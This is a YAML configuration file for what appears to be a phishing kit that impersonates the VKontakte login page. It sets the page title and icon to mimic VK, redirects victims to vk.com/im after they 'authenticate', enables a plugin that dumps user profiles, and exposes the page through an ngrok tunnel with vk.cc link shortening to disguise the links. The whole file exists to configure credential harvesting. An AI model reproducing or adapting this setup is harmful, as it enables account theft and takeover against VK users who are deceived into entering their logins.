title: Вход | ВКонтакте # Title of page, that will be visible to user
image: /icon.png # Same as title
exit: https://vk.com/im # User will go to this page after successful auth
port: 3000 # Port to server listen on

plugins: # List of plugins & their settings
  dumper: true # Dumper of user profiles, set `true` for enable, `false` for disable
  ngrok: # Ngrok config, see https://ngrok.com/docs#config
    region: eu
    # if you have any 
    # you can also uncomment authtoken field, for make link's life longer
    #authtoken: 
  vkcc: 
    tokens: [] # Default tokens for links shortening (can also be apps & groups)
    enabled: true
